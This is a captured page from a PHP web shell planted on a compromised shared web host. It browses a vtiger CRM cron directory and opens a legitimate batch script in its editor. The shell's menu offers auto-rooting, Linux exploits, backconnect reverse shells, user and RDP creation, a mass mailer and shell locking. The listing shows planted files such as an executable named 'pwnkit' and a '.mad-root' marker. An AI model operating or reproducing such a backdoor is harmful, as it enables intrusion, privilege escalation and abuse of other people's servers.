Linux webd002.cluster121.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.121.40.2 | : 216.73.216.88
Cant Read [ /etc/named.conf ]
7.2.34
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
letacommog /
crmleta /
cron /
[ HOME SHELL ]
Name
Size
Permission
Action
language
[ DIR ]
drwx---r-x
modules
[ DIR ]
drwx---r-x
.mad-root
0
B
-rw----r--
MailScanner.service
2.78
KB
-rw----r--
README-NewCronServiceSetup.txt
1.87
KB
-rw----r--
SendReminder.service
12.69
KB
-rw----r--
class.phpmailer.php
44.84
KB
-rw----r--
class.smtp.php
32.69
KB
-rw----r--
executecron.sh
594
B
-rw----r--
intimateTaskStatus.bat
887
B
-rw----r--
intimateTaskStatus.php
6.98
KB
-rw----r--
jobstartwindows.bat
1.19
KB
-rw----r--
output.txt
283
B
-rw----r--
pwnkit
0
B
-rwx---r-x
schtasks.exe
111
KB
-rw----r--
send_mail.php
1.94
KB
-rw----r--
sendreminder.sh
583
B
-rw----r--
sendsupportnotification.sh
594
B
-rw----r--
vtigercron.bat
748
B
-rw----r--
vtigercron.sh
651
B
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : jobstartwindows.bat
REM ************************************************************************************** REM * The contents of this file are subject to the vtiger CRM Public License Version 1.0 * REM * ("License"); You may not use this file except in compliance with the License * REM * The Original Code is: vtiger CRM Open Source * REM * The Initial Developer of the Original Code is vtiger. * REM * Portions created by vtiger are Copyright (C) vtiger. * REM * All Rights Reserved. * REM * * REM ************************************************************************************** @echo off set SCH_INSTALL=%1 FOR %%X in (%SCH_INSTALL%) DO SET SCH_INSTALL=%%~sX schtasks /create /tn "vtigerCRM Notification Scheduler" /tr %SCH_INSTALL%\apache\htdocs\vtigerCRM\cron\intimateTaskStatus.bat /sc daily /st 11:00:00 /RU SYSTEM schtasks /create /tn "vtigerCRM Email Reminder" /tr %SCH_INSTALL%\apache\htdocs\vtigerCRM\modules\Calendar\SendReminder.bat /sc minute /mo 1 /RU SYSTEM
Close